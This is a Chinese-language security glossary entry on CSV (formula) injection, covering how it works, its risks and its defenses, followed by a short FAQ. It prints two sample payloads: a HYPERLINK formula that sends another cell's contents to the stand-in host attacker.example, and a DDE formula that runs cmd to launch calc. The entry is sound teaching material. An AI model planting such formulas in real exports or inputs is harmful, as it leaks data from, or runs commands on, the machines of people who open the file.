Entry № 286
CSV 注入
CSV 注入 是什么?
CSV 注入在导出的 CSV 文件中嵌入电子表格公式,使 Excel 或 Sheets 打开时执行攻击者指定操作的攻击。
CSV 注入(又称公式注入)滥用了电子表格应用对以 =、+、-、@ 或制表符/回车开头的单元格自动求值的特性。当 Web 应用存储攻击者输入并随后导出为 CSV 时,生成的工作簿在被打开时可能调用 DDE、请求远程 URL、外泄数据或植入恶意软件。风险出现在文件的使用者一侧而非数据库本身,因此在代码审查中容易被遗漏。防御措施包括对以危险字符开头的单元格添加单引号或其他安全前缀、导出前对字段进行验证和转义,并提醒用户在打开不可信电子表格时保持警惕。
● 示例
- 01
联系表单的姓名字段接受 =HYPERLINK("https://attacker.example/?l="&A2,"点击"),打开导出文件时泄露其他单元格内容。
- 02
导出的 CRM 报表含 =cmd|'/c calc'!A1,在旧版 Excel 中触发 DDE。
● 常见问题
CSV 注入 是什么?
在导出的 CSV 文件中嵌入电子表格公式,使 Excel 或 Sheets 打开时执行攻击者指定操作的攻击。 它属于网络安全的 攻击与威胁 分类。
CSV 注入 是什么意思?
在导出的 CSV 文件中嵌入电子表格公式,使 Excel 或 Sheets 打开时执行攻击者指定操作的攻击。
如何防御 CSV 注入?
针对 CSV 注入 的防御通常结合技术控制与运营实践,详见上方完整定义。
CSV 注入 还有哪些其他名称?
常见的别称包括: 公式注入, Excel 宏注入。